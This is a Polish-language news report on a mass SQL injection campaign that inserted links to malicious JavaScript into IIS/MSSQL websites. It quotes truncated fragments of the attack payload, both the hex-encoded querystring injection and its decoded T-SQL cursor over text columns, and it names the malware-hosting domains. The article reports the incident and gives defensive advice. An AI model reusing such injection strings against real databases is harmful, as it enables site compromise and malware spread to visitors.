22 Styczeń 2018 03:14
KONTAKT o22.pl COŚ SIĘ WYDARZYŁO - POINFORMUJ NAS O TYM WYŚLIJ SMS lub MMS NA 693866065 lub NAPISZ


Reklama
blank.gif
blank.gif
Setki tysięcy witryn zaatakowane wstrzyknięciem SQL w Microsoft IIS/SQL Server
blank.gifGospodarkaWedług F-Secure i Panda Labs, ofiarami ataku stały się serwery WWW IIS oraz bazy danych Microsoft SQL. Hakerzy wyszukali strony ASP i ASPX, które zawierały dowolną formę łańcucha zapytania (querystring) – na przykład identyfikatora dokumentu czy numeru produktu i za jego pomocą spróbowali umieścić złośliwy kod SQL w bazie. Kod ten zaczynał się następująco:

DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x440045004300 4C00410052004500200040005400200076006100720063006800610072 00280032003500350029002C0040004300200076006100720063006800 610072002800320035003500290020004400450043004C004100520045 0020005400610062006C0065005F0043007500720073006F0072002000 43005500520053004F005200200046004F0052002000730065006C0065 0063007400200061002E006E0061006D0065002C0062002E006E006100 6D0065002000660072006F006D0020007300790073006F0062006A0065 00630074007300200061002C0073007900730063006F006C0075006D00 6E00730020006200200077006800650072006500200061002E00690064 003D0062002E0069006400200061006E006400200061002E0078007400 7900700065003D00270075002700200061006E0064002000280062002E 00780074007900700065003D003900390020006F007200200062002E00 780074007900700065003D003300350020006?który po zdekodowaniu zamieniał się w następujący zestaw instrukcji:

DECLARE @T varchar(255)'@C varchar(255) DECLARE Table_Cursor CURSOR FOR select a.name'b.name from sysobjects a'syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b?W konsekwencji do wszystkich pól tekstowych w bazie dodane zostały linki do złośliwego kodu JavaScript.

F-Secure zaleca zablokowanie dostępu do witryn hostujących złośliwy JavaScript – nmidahena.com, aspder.com i nihaorr1.com. Próbują one zainstalować u użytkownika trojana, który pobiera następnie cały zestaw innych szkodników. Należy też oczyścić bazę danych i upewnić się, że nasze aplikacje poprawnie oczyszczają dane przekazywane do baz, a w komórkach tabel nie jest przechowywany jakikolwiek obcy kod.

Ryan Sherstobitoff, korporacyjny ewangelista z Panda Labs powiedział, że jego firma informowała Microsoft o problemie z serwerem IIS, który mógł dać hakerom okazję do ataku. Microsoft jednak stwierdził, że sam bada ten problem.

17 kwietnia br. firma z Redmond ostrzegła użytkowników, że w większości wersji Windows jest błąd, który może zostać wykorzystany przez specjalnie przygotowane aplikacje internetowe, uruchamiane w IIS i korzystające z SQL Server.

Wczoraj Microsoft stwierdził, że nie wie, czy atak skierowany przeciwko witrynom działającym na IIS/MSSQL jest w jakikolwiek sposób związany ze znalezionym błędem. Rzecznik firmy w rozesłanym e-mailu napisał, że „Nie ustalono, czy raporty o atakach mają coś wspólnego z Microsoft Security Advisory 951306 opublikowanym w minionym tygodniu”. Co więcej, firma z Redmond zaprzeczyła, jakoby Panda informowała ich o tym problemie. Bill Sisk, menedżer komunikacji z Microsoft Security Response Center stwiedził, że „Microsoft jest świadomy zgłoszeń ataków na serwery IIS. Mimo że nikt oficjalnie nam nie zgłosił takiego ataku, wciąż będziemy śledzić wszelkie doniesienia i po zgromadzeniu wystarczającej ilości szczegółów rozpoczniemy śledztwo w sprawie”.

Security through obscurity? Póki co, administratorzy serwerów IIS wydają się poważnie zaniepokojeni atakiem.

Źródło: F-Secure blog, Computerworld, forum.iis.net

Źródło: Webhosting.pl
blank.gif
blank.gif blank.gif
Komentarze
blank.gif Brak dodanych komentarzy. Może czas dodać swój? blank.gif
Dodaj komentarz
blank.gif Zaloguj się, aby móc dodać komentarz. blank.gif
Oceny
blank.gif
Tylko zarejestrowani użytkownicy mogą oceniać zawartość strony

Zaloguj się lub zarejestruj, żeby móc zagłosować.

Brak ocen. Może czas dodać swoją?
blank.gif
Stat4u
blank.gif
statystyka
blank.gif
Nawigacja
blank.gif blank.gif
Najczęściej czytane
blank.gif blank.gif
Ostatnie artykuły
blank.gif
Brak artykułów
blank.gif
Pogoda
blank.gif
blank.gif
Polecamy
blank.gif
Idealna kobieta
Łukęcin
Seo katalog
Czarny humor
katalog stron
wpadki
Usługi elektryczne zachodniopomorskie


blank.gif
Logowanie
blank.gif
Nazwa użytkownika

Hasło



Nie możesz się zalogować?
Poproś o nowe hasło
blank.gif
Partnerzy
blank.gif

blank.gif
Ankieta
blank.gif
Czy Jestes za wprowadzeniem Euro-waluty w Polsce?

TAK

NIE

NIE WIEM

blank.gif
Ostatnio na forum
blank.gif
Najnowsze tematy
Regulamin
Najciekawsze tematy
Regulamin [0]
blank.gif
Przetłumacz stronę
blank.gif

blank.gif
Newsletter
blank.gif
Aby móc otrzymywać e-maile z Wiadomości musisz się zarejestrować.
blank.gif
Warto zobaczyć
blank.gif
filmy erotyczne
Katalog stron
Filmy online
telewizja HDTV
Inspiracje
Mocny czarny humor
blank.gif
RSS
blank.gif
blank.gif
Wygenerowano w sekund: 0.01 6,679,237 Unikalnych wizyt Theme Nautica by Harly